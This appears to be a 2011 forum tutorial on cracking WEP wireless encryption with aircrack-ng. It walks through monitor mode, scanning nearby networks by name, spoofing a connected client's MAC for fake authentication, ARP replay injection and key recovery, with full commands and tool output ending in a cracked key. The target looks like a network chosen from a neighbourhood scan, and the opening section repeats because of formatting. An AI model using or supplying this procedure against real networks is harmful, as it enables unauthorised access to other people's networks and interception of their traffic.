Attacking WEP wireless networks
Posted: Sun Sep 04, 2011 12:02 am
This tutorial is aimed to learning purposes only. You should use it on a network only if you have the administrator's permission. Use it under your own responsibility!
This tutorial will suppose the following:
First thing that we have to do is to set our wireless card into monitor mode. This way we can capture 802.11 packets from other networks, and also inject our own custom packets.
$ sudo airmon-ng stop wlan0
$ sudo airmon-ng start wlan0
We make sure monitor device has been created:
$ ifconfig mon0
Now we do a first scan on what is on the air 
$ sudo airodump-ng mon0
With airodump we're completely undetected. We're only listening to what's on the air. Since we are only interested in WEP networks, we'll filter by encryption:
$ sudo airodump-ng --encrypt wep mon0
We're searching for networks with high #Data output. WLAN_A1 network seems an excellent candidate. We'll filter by that network now:
$ sudo airodump-ng --encrypt wep --channel 9 --bssid 40:4A:03:BE:D6:A7 mon0
Yeah this one seems ideal to attack. It even has an associated client (with MAC E0:B9:A5:66:F7:9E), which is great because he generates data (and not only beacons). We're going to log those IVs to use them later to crack the WEP key:
$ sudo airodump-ng --encrypt wep --channel 9 --bssid 40:4A:03:BE:D6:A7 --ivs -w WLAN_A1 mon0
As we see, the connected cliented is already generating a lot of data. But what if he stops doing so, or disconnects? To prevent this, we're going to fake this client. First of all, we're going to fake the client's authentication, so it seems to the AP he never disconnected. Notice how we use the client's MAC with -h switch. All auth packets are been sent by his MAC, so we're still hidden.
$ sudo aireplay-ng --fakeauth 10 -a 40:4A:03:BE:D6:A7 -h E0:B9:A5:66:F7:9E mon0
This will repeat authentication every 10 seconds. Now even if he disconnects, the AP will still think he's connected. Now time to gather some of his data to generate more replies from the AP. This is useful in case he disconnects, to reuse later when he's disconnected or simply to generate more data. Notice again the use -h switch with client's MAC address.
$ sudo aireplay-ng --arpreplay -h E0:B9:A5:66:F7:9E -b 40:4A:03:BE:D6:A7 mon0
We got ARP requests and we're sending them back to the AP to generate even more data packets. This should increase IVs gathering, as we see:
This should be enough to crack the WEP key. Let's launch aircrack proper See the use of -c switch to limit cracking to alphanumeric characters, which are most likely used.
$ aircrack-ng -c WLAN_A1-01.ivs
And done! 
This is the easiest case you can find, but as you can see WEP encryption is pretty useless. This network's key was cracked in around 15 mins.
Hope this was useful for you, see you!
This tutorial will suppose the following:
- Running on a system with BASH interpreter (e.g. Linux)
- Wireless card that supports monitor mode and packet injection (e.g. Atheros chipset) working properly and with adequate drivers (this only matters on Windows)
- Aircrack suite (airmon, airodump, aireplay, aircrack) installed and operational
First thing that we have to do is to set our wireless card into monitor mode. This way we can capture 802.11 packets from other networks, and also inject our own custom packets.
$ sudo airmon-ng stop wlan0
Code: Select all
Interface Chipset Driver
wlan0 Unknown rt2800pci - [phy0]
(monitor mode disabled)Code: Select all
Interface Chipset Driver
wlan0 Unknown rt2800pci - [phy0]
(monitor mode enabled on mon0)$ ifconfig mon0
Code: Select all
mon0 Link encap:UNSPEC HWaddr EC-55-F9-B5-96-50-00-00-00-00-00-00-00-00-00-00
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1937 errors:0 dropped:1937 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:262666 (262.6 KB) TX bytes:0 (0.0 B)$ sudo airodump-ng mon0
Code: Select all
CH 11 ][ BAT: 1 hour 59 mins ][ Elapsed: 12 s ][ 2011-09-04 01:22
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
64:68:0C:8D:9C:23 -33 10 1 0 11 54e WPA CCMP PSK JAZZTEL_9C22
00:1A:2B:08:06:63 -70 11 0 0 3 54 WEP WEP WLAN_C2
00:1A:2B:5B:D8:34 -70 8 0 0 11 54 WEP WEP JAZZTEL_0C
00:24:17:18:40:FB -78 9 0 0 11 54 WPA TKIP PSK ORANGE-FB32FA
E8:39:DF:CF:D1:7E -85 2 0 0 3 54e WPA2 CCMP PSK Jazztel_A3
40:4A:03:9E:E4:D0 -83 6 0 0 4 54 . WEP WEP WLAN_25
00:21:63:6B:DA:58 -84 7 0 0 11 54e WPA TKIP PSK VodafoneDA57
40:4A:03:BE:D6:A7 -84 7 58 0 9 54 . WEP WEP WLAN_A1
00:1A:2B:13:98:1C -83 9 0 0 3 54 WEP WEP WLAN_D7
E8:39:DF:CF:D1:7D -84 5 0 0 3 54e WPA2 CCMP PSK Jazztel
00:1D:6A:6C:F4:C3 -85 5 0 0 6 54e. WPA2 CCMP PSK Orange-80f4
62:C7:14:33:18:5C -86 6 0 0 7 54e WPA CCMP PSK vodafoneenrique01
88:25:2C:71:90:98 -86 8 0 0 6 54e. WEP WEP nuria
00:13:49:89:27:7C -87 8 0 0 9 54 . WEP WEP WLAN_91
00:1A:2B:4A:6E:0E -88 8 0 0 11 54 WEP WEP adsuar
00:22:2D:3E:8D:48 -89 8 0 0 11 54e. WEP WEP lucy_david
E0:91:53:49:70:DA -90 9 1 0 10 54 . WEP WEP WLAN_78
00:23:08:E3:C5:34 -90 3 4 0 9 54e. WEP WEP WLAN3C5903
5C:33:8E:E0:63:3A -90 5 0 0 6 54e. WPA2 CCMP PSK Reaviles_Madrid
50:67:F0:88:20:9C -92 5 0 0 7 54 . WEP WEP WLAN_0B
00:1A:2B:08:E4:BB -93 0 0 0 11 54 WEP WEP galapagos
BSSID STATION PWR Rate Lost Packets Probes
(not associated) 40:28:49:55:A8:C2 0 0 - 1 0 11
64:68:0C:8D:9C:23 7C:61:93:E5:6B:5B -40 0 - 5e 0 1
40:4A:03:BE:D6:A7 E0:B9:A5:66:F7:9E -70 0 -54 238 61 WLAN_A1 $ sudo airodump-ng --encrypt wep mon0
Code: Select all
CH 10 ][ BAT: 2 hours 2 mins ][ Elapsed: 24 s ][ 2011-09-04 01:23
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:1A:2B:5B:D8:34 -70 18 0 0 11 54 WEP WEP JAZZTEL_0C
00:1A:2B:08:06:63 -70 19 0 0 3 54 WEP WEP WLAN_C2
00:1A:2B:13:98:1C -82 19 0 0 3 54 WEP WEP WLAN_D7
40:4A:03:9E:E4:D0 -84 17 0 0 4 54 . WEP WEP WLAN_25
40:4A:03:BE:D6:A7 -84 16 182 0 9 54 . WEP WEP WLAN_A1
00:13:49:89:27:7C -87 13 0 0 9 54 . WEP WEP WLAN_91
88:25:2C:71:90:98 -87 15 0 0 6 54e. WEP WEP nuria
00:22:2D:3E:8D:48 -87 10 0 0 11 54e. WEP WEP lucy_david
00:1A:2B:4A:6E:0E -88 11 0 0 11 54 WEP WEP adsuar
00:23:08:E3:C5:34 -89 4 0 0 9 54e. WEP WEP WLAN3C5903
E0:91:53:49:70:DA -90 7 0 0 10 54 . WEP WEP WLAN_78
64:68:0C:6C:9C:11 -92 2 0 0 6 54 WEP WEP Wireless Jazztel
50:67:F0:88:20:9C -92 4 0 0 7 54 . WEP WEP WLAN_0B
00:1A:2B:08:E4:BB -93 6 0 0 11 54 WEP WEP galapagos
00:60:4C:98:61:89 -95 2 0 0 6 54 . WEP WEP adsl4917
BSSID STATION PWR Rate Lost Packets Probes
40:4A:03:BE:D6:A7 E0:B9:A5:66:F7:9E -72 0 -54 240 181 $ sudo airodump-ng --encrypt wep --channel 9 --bssid 40:4A:03:BE:D6:A7 mon0
Code: Select all
CH 9 ][ BAT: 2 hours 3 mins ][ Elapsed: 8 s ][ 2011-09-04 01:27
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
40:4A:03:BE:D6:A7 -88 6 74 475 44 9 54 . WEP WEP WLAN_A1
BSSID STATION PWR Rate Lost Packets Probes
40:4A:03:BE:D6:A7 E0:B9:A5:66:F7:9E -70 0 -54 99 473 $ sudo airodump-ng --encrypt wep --channel 9 --bssid 40:4A:03:BE:D6:A7 --ivs -w WLAN_A1 mon0
Code: Select all
CH 9 ][ BAT: 1 hour 57 mins ][ Elapsed: 8 s ][ 2011-09-04 01:30
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
40:4A:03:BE:D6:A7 -88 7 91 519 47 9 54 . WEP WEP WLAN_A1
BSSID STATION PWR Rate Lost Packets Probes
40:4A:03:BE:D6:A7 E0:B9:A5:66:F7:9E -70 0 -54 74 519$ sudo aireplay-ng --fakeauth 10 -a 40:4A:03:BE:D6:A7 -h E0:B9:A5:66:F7:9E mon0
Code: Select all
The interface MAC (EC:55:F9:B5:96:50) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether E0:B9:A5:66:F7:9E
01:33:27 Waiting for beacon frame (BSSID: 40:4A:03:BE:D6:A7) on channel 9
01:33:27 Sending Authentication Request (Open System)
01:33:27 Authentication successful
01:33:27 Sending Association Request
01:33:27 Association successful :-) (AID: 1)
[ACK]$ sudo aireplay-ng --arpreplay -h E0:B9:A5:66:F7:9E -b 40:4A:03:BE:D6:A7 mon0
Code: Select all
The interface MAC (EC:55:F9:B5:96:50) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether E0:B9:A5:66:F7:9E
01:36:45 Waiting for beacon frame (BSSID: 40:4A:03:BE:D6:A7) on channel 9
Saving ARP requests in replay_arp-0904-013645.cap
You should also start airodump-ng to capture replies.
Read 5291 packets (got 1485 ARP requests and 229 ACKs), sent 2742 packets...(500 pps)Code: Select all
CH 9 ][ BAT: 1 hour 9 mins ][ Elapsed: 8 mins ][ 2011-09-04 01:38
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
40:4A:03:BE:D6:A7 -84 45 4072 34576 361 9 54 . WEP WEP OPN WLAN_A1
BSSID STATION PWR Rate Lost Packets Probes
40:4A:03:BE:D6:A7 E0:B9:A5:66:F7:9E 0 24 - 1 8121 81946 WLAN_A1$ aircrack-ng -c WLAN_A1-01.ivs
Code: Select all
Opening WLAN_A1-01.ivs
Read 51527 packets.
# BSSID ESSID Encryption
1 40:4A:03:BE:D6:A7 WLAN_A1 WEP (51526 IVs)
Choosing first network as target.
Opening WLAN_A1-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 51738 ivs.
Aircrack-ng 1.1 r1904
[00:00:00] Tested 37 keys (got 30056 IVs)
KB depth byte(vote)
0 0/ 2 5A(42752) 7D(36608) 9E(36608) E6(36608) ED(36352) 64(36096) 7F(36096) 0B(35840) 3F(35584) 89(35584) 66(35072) 6D(35072) 2F(34816)
1 7/ 8 6B(36352) 62(35584) 03(35328) 29(35328) 70(35072) 7A(34816) A2(34816) A7(34816) 0D(34560) 32(34560) 8C(34560) 1E(34304) CA(34304)
2 3/ 2 8D(36096) 33(35840) 90(35840) 1C(35072) 2D(35072) BB(35072) FF(35072) 0C(34816) 53(34816) D0(34816) 9C(34560) AB(34560) 23(34304)
3 4/ 3 C0(36864) A2(35840) AF(35840) 30(35584) 36(35584) 31(35328) 79(35072) 2A(34816) 2D(34560) 55(34560) 14(34304) 4F(34304) FA(34304)
4 0/ 2 33(45568) 69(39680) E3(36096) 0E(35328) 13(35328) 23(35328) 80(35328) B4(35328) E4(35328) 92(35072) 9C(35072) 0F(34816) 87(34816)
KEY FOUND! [ 5A:34:30:34:41:30:33:43:35:30:45:41:31 ] (ASCII: Z404A03C50EA1 )
Decrypted correctly: 100%Hope this was useful for you, see you!
